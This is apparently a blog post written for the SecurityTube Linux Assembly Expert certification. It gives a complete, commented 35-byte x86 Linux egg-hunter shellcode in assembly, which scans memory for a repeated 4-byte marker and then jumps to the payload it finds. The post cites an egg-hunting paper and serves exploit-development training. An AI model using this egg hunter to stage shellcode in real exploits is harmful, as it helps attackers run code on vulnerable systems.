Source: SecurityTube
I found a very interesting document explained different techniques of Egg hunting, in this document explained how to search it in Windows and Linux, you can found this document here. I really recommend read this paper if you want know how it works
;SLAE-513 Andriy Brukhovetskyy ;egg hunting explained some techniques ;http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf ;35 bytes global _start section .text _start: xor ecx, ecx ; 0 get_memory_block: or dx, 0xfff ; is the same as "add dx, 4095" (PAGE_SIZE) checker: inc edx ; next memory offset push byte +0x21 ; __NR_access 33 pop eax lea ebx, [edx+4] ; alignment to validate the last four bytes of the signature ; ecx already contains 0 (F_OK) int 0x80 ; syscall ; bad address = EFAULT = 0xf2 = -14 cmp al, 0xf2; because it's not a file jz get_memory_block ; if is not, loop mov eax, 0x50905090 ; egg here in little endiant mov edi, edx scasd; compare next 4 bytes and edi+4 jnz checker ; return and search scasd; compare next 4 bytes and edi+4 jnz checker ; return and search jmp edi; if we here == we found the eggs, jump to our shellcode :)
SLAE-513
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
No hay comentarios:
Publicar un comentario